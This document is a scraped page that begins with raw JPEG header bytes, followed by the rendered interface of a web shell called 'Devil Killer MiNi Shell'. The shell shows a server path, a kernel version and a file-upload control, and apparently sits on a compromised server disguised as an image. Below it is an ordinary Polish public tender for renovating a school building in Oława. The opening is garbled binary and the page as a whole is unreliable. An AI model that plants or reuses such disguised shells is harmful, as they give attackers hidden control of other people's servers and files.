JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220215/0005789101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja budynku użyteczności publicznej - Budynku pomocniczego LO nr I w Oławie wraz z przebudową i zagospodarowaniem pomieszczeń </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Oławski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934727</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3 Maja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oława</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@starostwo.olawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.starostwo.olawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja budynku użyteczności publicznej - Budynku pomocniczego LO nr I w Oławie wraz z przebudową i zagospodarowaniem pomieszczeń </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-95b2fe8c-8e56-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00057891</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001221/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Termomodernizacja budynku użyteczności publicznej - Budynku pomocniczego Liceum Ogólnokształcącego nr I w Oławie wraz z przebudową i zagospodarowaniem pomieszczeń</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.sidaspzp.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.sidaspzp.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.1	Komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie <br/>w formie elektronicznej przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy dostępnej bezpłatnie pod adresem https://zamowienia.sidaspzp.pl/<br/>Oferty składa się pod rygorem nieważności w formie elektronicznej opatrzonej podpisem elektronicznym za pośrednictwem Platformy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1.	administratorem danych osobowych Wykonawcy będącego osobą fizyczną jest:<br/>Zdzisław Brezdeń - Starosta Oławski<br/>Adres: ul. 3 Maja 1, 55-200 Oława<br/>Adres poczty elektronicznej: info@starostwo.olawa.pl<br/>Numer telefonu:	(71) 301 15 22<br/>Numer faksu:	(71) 301 15 62<br/>2.	kontakt z inspektorem ochrony danych osobowych w Starostwie Powiatowym <br/>w Oławie ul. 3 Maja 1, 55-200 Oława, tel: 71 301 15 33, e-mail: iod@starostwo.olawa.pl <br/>3.	dane osobowe wykonawcy będącego osobą fizyczną przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem <br/>o udzielenie zamówienia publicznego IZP.272.11.2022, „Termomodernizacja budynku użyteczności publicznej - Budynku pomocniczego LO nr I w Oławie wraz z przebudową i zagospodarowaniem pomieszczeń”.<br/>4.	Odbiorcami danych osobowych Wykonawcy będącego osobą fizyczną, będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych;<br/>5.	Dane osobowe Wykonawcy będącego osobą fizyczną, będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6.	Obowiązek podania przez Wykonawcę będącego osobą fizyczną, danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu <br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7.	W odniesieniu do danych osobowych Wykonawcy będącego osobą fizyczną, decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8.	Wykonawca będący osobą fizyczną posiada:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania danych osobowych dotyczących Wykonawcy;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>9. Nie przysługuje Wykonawcy będącemu osobą fizyczną:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.272.11.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest termomodernizacja budynku użyteczności publicznej - Budynku pomocniczego LO nr I w Oławie wraz z przebudową i zagospodarowaniem pomieszczeń. Budynek zlokalizowany jest na Pl. Zamkowym 14 w Oławie (dz. nr 85, 86/2, 1/3). Termomodernizowany budynek usytuowany jest w obrębie zabudowy usługowej. W/w teren znajduje się na obszarze układu urbanistycznego i zabytkowego zespołu zabudowy historycznego ośrodka miasta Oława. Budynek zajmuje całą powierzchnię działki – linia zabudowy pokrywa się z granicą działki. Budynek jest wykonany w technologii tradycyjnej. Przykryty dwuspadową więźbą dachową z dwoma ścianami szczytowymi, częściowo podpiwniczony (węzeł cieplny), posiada 3 kondygnacje oraz poddasze nieużytkowe.<br/>Zakres prac polegać będzie na dostosowaniu budynku do obowiązujących przepisów <br/>w oparciu o ekspertyzę p.poż., Warunki Techniczne oraz wymogi konserwatorskie. Doprowadzenie budynku do właściwego stanu technicznego zrealizowane zostanie poprzez: ocieplenie budynku, remont elewacji, przebudowę układu i częściową zmianę funkcji pomieszczeń, remont wnętrza budynku ( remont posadzek, schodów, ścian, sufitów), wymiana stolarki okiennej, remont / wymiana stolarki drzwiowej wewnętrznej oraz zewnętrznej, przebudowa instalacji wodno – kanalizacyjnej, przebudowa instalacji c.o., przebudowa instalacji elektrycznych, telekomunikacyjnych i teletechnicznych, remont instalacji odgromowej.<br/>W zakresie zamówienia jest również uzyskanie wszelkich decyzji i pozwoleń wymaganych do użytkowania obiektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442110-1 - Malowanie budynków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie kierował się następującymi kryteriami:<br/>	Cena 60 %<br/>	Okres gwarancji 40 %<br/>Okres gwarancji nie może być krótszy niż 36 miesięcy i nie dłuższy niż 60 miesięcy. W przypadku, gdy Wykonawca poda okres krótszy niż 36 miesięcy oferta zostanie odrzucona, natomiast w przypadku, gdy Wykonawca poda okres gwarancji dłuższy niż 60 miesięcy Zamawiający przyjmie do badania oraz do umowy okres gwarancji 60 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa. <br/>3.1	Dysponowane osobami posiadającymi uprawnienie do kierowania robotami budowlanymi.<br/>Zamawiający uzna, że Wykonawca spełnia przedmiotowy warunek jeżeli wykaże, że:<br/>a)	dysponuje osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, <br/>b)	dysponuje osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>Uwaga: Zamawiający dopuszcza wykazanie tej samej osoby posiadającej uprawnienia w więcej niż jednej ze wskazanych branż.<br/>3.2	Posiadanie doświadczenia niezbędnego do wykonania przedmiotu zamówienia:<br/>Zamawiający uzna, że Wykonawca spełnia przedmiotowy warunek jeżeli wykaże, że:<br/>a)	W okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej 2 zamówienia polegające na budowie/przebudowie/remoncie budynku mieszkalnego, zamieszkania zbiorowego lub użyteczności publicznej (zdefiniowanych w Rozporządzeniu Ministra Infrastruktury <br/>z dnia 12.04.2002 r. „w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie” Dz. U. z 2019 r., poz.1065, z późn. zm.) wraz z instalacjami o wartości robót co najmniej 700 000,00 zł. (słownie: siedemset tysięcy złotych brutto) każda.<br/>W przypadku robót, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia robót (w przypadku robót rozliczanych wyłącznie w walutach innych niż PLN).<br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 117 ust. 3 Pzp w sytuacji, gdy powyższy warunek będzie spełniony przez jednego ze wspólników konsorcjum to ten wspólnik musi wykonać części robót budowlanych o wartości robót co najmniej 700 000,00 zł brutto (słownie: siedemset tysięcy złotych brutto).<br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 118 ust. 2 Pzp w sytuacji, gdy powyższy warunek będzie spełniony nie przez wykonawcę lub wspólnika konsorcjum, a przez „podmiot udostępniający zasoby wykonawcy (tzw. „podmiot trzeci”), to „podmiot” ten musi być podwykonawcą części robót budowlanych o wartości robót co najmniej 700 000,00 zł brutto (słownie: siedemset tysięcy złotych brutto).<br/>3.3	Zobowiązanie wykonawcy do posiadania polisy OC<br/>Zobowiązanie wykonawcy złożone w Formularzu Ofertowym, że w terminie do 14 dni po zawarciu umowy (w przypadku złożenia najkorzystniejszej oferty) przedłoży zamawiającemu dokumenty potwierdzające posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę w wysokości co najmniej 1 000 000,00 zł <br/>Ubezpieczenie ma obejmować:<br/>1.	ubezpieczenie w pełnym zakresie od odpowiedzialności cywilnej kontraktowej w związku z realizacją niniejszej umowy, ubezpieczenie od zniszczenia wszelkiej własności spowodowanego działaniem, zaniechaniem lub niedopatrzeniem wykonawcy, <br/>2.	ubezpieczenie w pełnym zakresie od odpowiedzialności cywilnej deliktowej z tytułu prowadzonej działalności wobec powierzonego mienia i osób trzecich, ubezpieczenie od zniszczenia wszelkiej własności spowodowanego działaniem, zaniechaniem lub niedopatrzeniem wykonawcy,<br/>3.	ubezpieczenie całego procesu budowlanego objętego niniejszą umową w zakresie wszystkich ryzyk budowy, obejmujących odpowiedzialnością zamawiającego, wykonawcę i podwykonawców oraz inne podmioty zaangażowane przy realizacji umowy. Ubezpieczenie nie może wyłączać odpowiedzialności ubezpieczyciela po odbiorach częściowych lub przekazaniu części obiektu do eksploatacji. <br/>4.	Zawarte umowy ubezpieczenia mogą podlegać weryfikacji przez Zamawiającego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.wykaz wykonanych robót budowlanych wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane,– wg Załącznika nr 6 do<br/>SWZ. Do załącznika należy dołączyć dowody (referencje bądź inne dokumenty) potwierdzające, że<br/>roboty budowlane wyszczególnione w zał. nr 6 do SWZ zostały wykonane należycie<br/>2.wykaz osób – wg Załącznika nr 7 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Potwierdzenie aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w Rozdziale V pkt. 1.3 SWZ w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez Zamawiającego – wg załącznika nr 8 do SWZ.<br/>2.b) Oświadczenie Wykonawcy o braku przynależności lub o przynależności do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.<br/>U. z 2020 r. poz. 1076 i 1086) z innym Wykonawcą, który złożył ofertę wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – wg załącznika nr 9 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Każda składana oferta musi być zabezpieczona wadium w kwocie 20 000,00 PLN /słownie: dwadzieścia tysięcy złotych/.<br/>2.	Wadium musi zostać wniesione najpóźniej do dnia 02.03.2022r. do godz. 10.00. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy na konto: Bank Spółdzielczy w Oławie: nr konta: 05 9585 0007 0010 0018 0542 8091, z dopiskiem „Wadium do postępowania pn. Termomodernizacja budynku użyteczności publicznej - Budynku pomocniczego LO nr I w Oławie wraz z przebudową i zagospodarowaniem pomieszczeń”.<br/>3.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 6, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>4.	Wadium wnoszone w pieniądzu na konto Zamawiającego przyjmuje się, że zostało złożone w terminie jeżeli w dniu składania ofert do godz. 10.00 znajduje się na koncie Zamawiającego.<br/>5.	Wadium może być wniesione w: <br/>	pieniądzu – wpłaca się przelewem na rachunek: 05 9585 0007 0010 0018 0542 8091<br/>	gwarancjach bankowych,<br/>	gwarancjach ubezpieczeniowych,<br/>	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>6. Oferta Wykonawcy, która nie będzie zabezpieczona akceptowaną formą wadium, zostanie przez Zamawiającego odrzucona. <br/>7.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana. <br/>a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych <br/>w ofercie,<br/>b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,<br/>c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br/>8.	Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, żądaniem zapłaty wadium, jeżeli:<br/>wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 ustawy Pzp, z przyczyn leżących po jego stronie:<br/>	nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 ust. Pzp, <br/>	oświadczenia, o którym mowa w art. 125 ust. 1 ustawy,<br/> innych dokumentów lub oświadczeń <br/>	lub nie wyraził zgody na 